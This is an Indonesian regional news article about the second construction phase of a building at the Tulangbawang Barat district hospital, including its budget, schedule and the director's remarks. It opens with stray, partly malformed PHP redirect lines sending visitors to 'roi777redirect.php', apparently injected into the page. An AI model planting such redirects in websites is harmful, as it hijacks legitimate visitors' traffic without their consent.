header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Pembangunan Tahap Dua RSUD Tubaba Telan Anggaran 12,4 M, Bupati: Pelayana Kesehatan Diperioritaskan. -
Pembangunan Tahap Dua RSUD Tubaba Telan Anggaran 12,4 M, Bupati: Pelayana Kesehatan Diperioritaskan.

TRANSLAMPUNG–PANARAGAN.
Pembangunan tahap dua Gedung A Rumah Sakit Umum Daerah (RSUD) Kabupaten Tulangbawang Barat (Tubaba) Tiyuh Panaragan, Kecamatan Tulangbawang Tengah kembai dilanjutkan oleh  PT. Rafi Cahaya Family sejak 6 juni 2018 lalu dengan anggaran mencapai Rp 12.4 Miliar.

Pembangunan tahap dua Rumah Sakit (RS) tersebut ditargetkan terhitung masa kerja selama 180 hari kalender, serta pendanaan pembangunannya  bersumber dari Dana Alokasi Khusus‎ (DAK) tahun anggaran 2018.

Bedasar pantauan Translampung akhir belakangan lalu, ‎nampaknya Bupati Umar Ahmad Sp  telah memprioritaskan beragam pembangunan pada tahun anggaran 2018, termasuk menuntaskan pembangunan sejumlah fasilitas pelayanan kesehatan pada RSUD setempat.

‎Menurut  Direktur RSUD Tubaba Dr. Pramono, pembangunan Gedung A RSUD Tubaba menjadi prioritas Bupati Umar Ahmad pada bidang kesehatan untuk dapat lebih meningkatkan pelayanan masyarakat secara maksimal di bumi yang bergelar Ragem Sai Mangi Wawai.

” Pak Bupati ingin pelayanan kesehatan di Tubaba terus meningkat, beliau inginkan fasilitas RSUD terus terpenuhi meskipun bertahap, untuk teknis pembangunannya itu ada pada Dinas Kesehatan.” Kata Pramono, terhadap Translampung  melaui telpon seluernya (4/7) pukul 08:30 Wib.

‎pasca pembangunan gedung setempat lanjut dia, nantinya akan dipergunakan untuk sejumlah pelayanan kesehatan bagi masyarakat secara khusus.

” Gedung A itu akan kita gunakan untuk pelayan khusus seperti Poli Kesehatan, Ruang Bedah, Ruang Persalinan dan pelayanan lainnya. Insyaallah setelah selesai akhir tahun 2018 ini akan kita persiapkan untuk ditempati.” Imbuhnya (Dirman)

 

News Reporter
Kepala Biro Tulangbawang Barat